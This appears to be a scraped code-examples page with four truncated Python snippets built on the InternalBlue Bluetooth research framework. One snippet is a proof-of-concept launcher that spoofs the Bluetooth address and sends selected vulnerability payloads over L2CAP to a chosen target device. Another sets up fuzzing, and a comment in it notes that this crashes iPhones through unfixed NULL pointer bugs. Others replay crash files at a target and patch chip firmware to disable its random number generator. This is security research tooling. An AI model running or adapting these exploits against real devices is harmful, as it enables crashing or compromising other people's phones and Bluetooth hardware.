Exemple #1
0
def main():
    internalblue = iOSCore()

    # let user choose device if more than one is connected
    devices = internalblue.device_list()
    if len(devices) > 1:
        i = options("Please specify device: ", [d[2] for d in devices], 0)
        internalblue.interface = internalblue.device_list()[i][1]
    else:
        internalblue.interface = internalblue.device_list()[0][1]

    # let use choose the vuln
    i = options("Please choose your vuln: ", [v["description"] for v in VULNS], 0)

    vuln = VULNS[i]

    if not internalblue.connect():
        log.critical("No connection to internalblue device.")
        sys.exit(-1)

    # if the vuln requires an address change, ask for the address
    if "addr_change" in vuln and vuln["addr_change"]:
        change_addr = input("This PoC requires the Bluetooth address to be changed, " + 
                "please provide it: ")
        change_addr = bd_addr_to_bytes(change_addr)
        internalblue.sendHciCommand(0xfc01, change_addr[::-1])

    # now we need the bd addr of the target
    target = bd_addr_to_bytes(input("Target Bluetooth address: "))

    # connect to the target
    connection = BluetoothConnection(internalblue, target, reconnect=0)
    l2cap = InternalBlueL2CAP.L2CAPManager(connection)

    # in case we need an answer for one of the PoCs we listen to the given CID
    if "listen_cid" in vuln:
        l2cap.registerCIDHandler(listener, vuln["listen_cid"])

    # set the Bluetooth technology [0->Classic, 1->BLE]
    connection.connection_type = vuln["tech"]
    connection.connect()

    # If the PoC includes larger messages we need to do the MagicPairing Ping trick to
    # increase the MTU. This could also be done by sending L2CAP Information Requests and
    # Responses but this would take longer.
    if vuln["mtu"]:
        log.info("Sending MagicPairing Ping to increase L2CAP MTU")
        l2cap.sendData(bytes.fromhex("F00000"), 0x30)

    desc = vuln["description"]
    log.info("Executing payload for %s", desc[:desc.find("]")+1])
    if isinstance(vuln["payload"], list):
        for p in vuln["payload"]:
            l2cap.sendData(bytes.fromhex(p), vuln["cid"])
    else:
        log.info("Sending: { %s }", vuln["payload"])
        l2cap.sendData(bytes.fromhex(vuln["payload"]), vuln["cid"])

    time.sleep(1)
Exemple #2
0
    def __init__(self, target):
        # set up internalblue, adapt if you need a different core or device
        self.internalblue = iOSCore(log_level=10)
        devices = self.internalblue.device_list()
        i = options("Please specify device: ", [d[2] for d in devices], 0)
        self.internalblue.interface = self.internalblue.device_list()[i][1]
        if not self.internalblue.connect():
            log.critical("No connection to internalblue device")
            sys.exit(-1)

        # for MP it might make sense to change this to a known device address
        # as unknown addresses cause the receiving iPhone to crash constantly
        # as long as Apple does not fix these NULL pointer derefs
        # self.internalblue.sendHciCommand(0xfc01, bytes.fromhex("cafebabe1337"))

        # set up BT connection to the target
        self.connection = BluetoothConnection(self.internalblue,
                                              target,
                                              reconnect=0)
        self.connection.connect()

        self.fuzzer = None
        self.connection.connection_callback = self.init_fuzzer()
Exemple #3
0
    // send hci event
    mov  r0, r4  // back to buffer at offset 0
    bl  0x573B8     // send_hci_event_without_free()
    
    // free HCI buffer
    mov r0, r4
    bl  0x581AE     // osapi_blockPoolFree

    pop   {r0-r4, pc}
    
    
""" % (MEM_ROUNDS, MEM_RNG)


internalblue = iOSCore(log_level='info')
internalblue.interface = internalblue.device_list()[0][1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")
    exit(-1)

progress_log = log.info("installing assembly patches...")



# Disable original RNG
patch = asm("bx lr; bx lr", vma=FUN_RNG)  # 2 times bx lr is 4 bytes and we can only patch 4 bytes
if not internalblue.patchRom(FUN_RNG, patch):
    log.critical("Could not disable original RNG!")
Exemple #4
0
_BLE = 1

if len(sys.argv) < 3:
    log.error("USAGE: {} crash_file bd_addr [BLE]".format(sys.argv[0]))
    sys.exit(-1)

crashfile = sys.argv[1]
bd_addr = sys.argv[2].replace(":", "")

# only do BLE if specified
tech = _CLASSIC
if len(sys.argv) == 4:
    log.info("Using BLE")
    tech = _BLE

internalblue = iOSCore(log_level=10)

# let user choose device is more than one is connected
devices = internalblue.device_list()
i = options("Please specify device: ", [d[2] for d in devices], 0)
internalblue.interface = internalblue.device_list()[i][1]

# setup sockets
if not internalblue.connect():
    log.critical("No connection to internalblue device.")
    sys.exit(-1)

connection = BluetoothConnection(internalblue,
                                 bytes.fromhex(bd_addr),
                                 reconnect=0)
l2cap_mgr = InternalBlueL2CAP.L2CAPManager(connection)